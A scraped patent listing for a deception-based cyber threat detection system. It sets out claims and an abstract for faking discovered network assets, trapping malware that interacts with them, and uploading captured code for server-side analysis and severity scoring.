System and method for cyber threats detection
First Claim
Patent Images
1. A method of detecting a cyber threat, the method comprising:
- automatically discovering real resources on a network, wherein the real resources provide services and wherein the real resources include at least one of;
a device and a server;
faking at least one real resource discovered on the network wherein faking a resource includes advertising at least one service provided by the faked resource;
detecting an interaction of a malware applications with the faked resource;
capturing code of the malware applications and storing the code on the faked resource;
uploading the code to a server;
analyzing the code, by the server, to produce an analysis result;
determining, for each of the plurality of payloads, a severity score based on the analysis result;
providing a report based on the scores; and
performing at least one action based on the analysis result.
2 Assignments
0 Petitions
Accused Products
Abstract
A system and method for detecting a cyber-threat according to embodiments of the present invention comprise automatically discovering resources on a network, by a resource detection unit, emulating, by a faked asset creation unit, at least one resource discovered on the network, associating a malware trap sensor with the emulated resource and detecting by the malware trap sensor, a malware related to the emulated resource. The system and method may further comprise uploading data related to the detected malware to a server, analyzing, by the server, uploaded data to produce an analysis result and perform one or more actions based on the analysis result.
-
Citations
18 Claims
-
1. A method of detecting a cyber threat, the method comprising:
-
automatically discovering real resources on a network, wherein the real resources provide services and wherein the real resources include at least one of;
a device and a server;faking at least one real resource discovered on the network wherein faking a resource includes advertising at least one service provided by the faked resource; detecting an interaction of a malware applications with the faked resource; capturing code of the malware applications and storing the code on the faked resource; uploading the code to a server; analyzing the code, by the server, to produce an analysis result; determining, for each of the plurality of payloads, a severity score based on the analysis result; providing a report based on the scores; and performing at least one action based on the analysis result. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12)
-
-
13. A system for cyber threats detection comprising:
-
a server comprising a management unit; a client network; an external network; and a computer comprising a user interface unit; wherein said client network comprises; a resource detection unit configured to automatically discover real assets on a network, wherein the real assets provide services and wherein the real assets include at least one of;
a device and a server;an asset inventory; a faked assets creation unit configured to fake at least one real asset discovered on the network wherein faking an asset includes advertising at least one service provided by the faked asset; a plurality of faked assets; and a malware trap sensor configured to; detect an interaction of malware applications with a faked asset, and capture code of the malware applications and upload the code to the server; wherein the server is adapted to analyze the code to produce an analysis result; determining, for each of the plurality of payloads, a severity score based on the analysis result; providing a report based on the scores; and perform at least one action based on the analysis result. - View Dependent Claims (14, 15, 16, 17, 18)
-
Specification